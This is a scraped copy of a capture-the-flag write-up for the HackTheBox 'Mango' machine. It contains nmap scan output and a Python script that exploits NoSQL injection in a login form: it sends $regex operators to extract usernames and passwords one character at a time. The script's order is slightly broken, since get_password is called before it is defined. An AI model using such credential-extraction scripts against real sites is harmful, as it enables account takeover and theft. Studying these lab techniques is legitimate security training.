5
HackTheBox-Mango - ssooking
source link: https://ssooking.github.io/2020/07/hackthebox-mango/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
HackTheBox-Mango - ssooking
nmap扫描常见端口,发现开启了22、80、443。
# nmap -T4 -sS -sV -sC 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 01:51 EST
Nmap scan report for 10.10.10.162
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds在nmap的443端口输出信息中看到staging-order.mango.htb,加到/etc/hosts中后访问
NoSQL注入脚本:
#!/usr/bin/env python
import requests
import string
url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "icc5dp0dufeh68mctc9dlne8jd"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_usernames():
usernames = []
params = {
"username[$regex]":"",
"password[$regex]":".*",
"login": "login"
}
for c in possible_chars:
username = "^" + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url,
data=params,
headers=headers,
cookies=cookies,
allow_redirects=False
)
if int(pr.status_code) == 302:
print("Found username starting with "+c)
while True:
for c2 in possible_chars:
params["username[$regex]"] = username + c2 + ".*"
if int(requests.post(url, data=params, headers=headers, cookies=cookies, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break
if c2 == possible_chars[-1]:
print("Found username: " +username[1:])
usernames.append(username[1:])
break
return usernames
for u in get_usernames():
get_password(u)
def get_password(username):
print("Extracting password of " + username)
params = {
"username":username,
"password[$regex]":"",
"login": "login"
}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url,
data=params,
headers=headers,
cookies=cookies,
allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print ("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")NoSQL Injection
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK